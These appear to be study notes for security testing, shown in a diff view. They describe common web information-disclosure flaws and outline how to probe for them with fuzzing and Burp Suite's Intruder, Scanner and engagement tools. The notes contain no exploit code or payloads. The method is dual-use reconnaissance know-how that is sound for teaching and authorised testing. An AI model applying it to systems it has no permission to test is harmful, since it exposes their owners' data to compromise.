- Revealing names of hidden directories
- Providing access to source code files via temporary backups
- Explicitly mentioning database table or column names in error messages
- Exposing sensitive info such as credit card details
- Hard-coding API keys, IPs, creds, etc in source code
These are often less severe but can become severe depending on the data. Even "less severe" information
disclosure such as technical details can be used to further enumerate the web server or system and identify more
flaws for exploitation. In other words, this can be chained together for more compromise.

View file

@ -0,0 +1,25 @@
## Testing for Information Disclosure
Fuzzing
1. Identify interesting parameters in the web application
2. Submit unexpected data types or specially crafted fuzz strings to see the response
3. Automate this process with Burp Intruder
a. Add payload positions to parameters and use pre-built wordlists of fuzz strings
b. Easily identify differences in responses by comparing HTTP status code, response times, etc.
c. Use grep matching rules to identify occurrences of keywords
Burp Scanner
1. Run a Burp Scan to get the following:
a. Live scanning features while browsing the website
b. Schedule automated scans to crawl and target the target site on your behalf
c. Automatically flag information disclosure vulns for you
Burpsuite Engagement Tools
1. Right click any HTTP message and select "Engagement tools"
2. Search
a. Look for any expression within the selected item
3. Find Comments
a. Extract any developer comments found in a selected item
4. Discover Content
a. Identify additional content and functionality not linked in visible website

Some files were not shown because too many files have changed in this diff Show more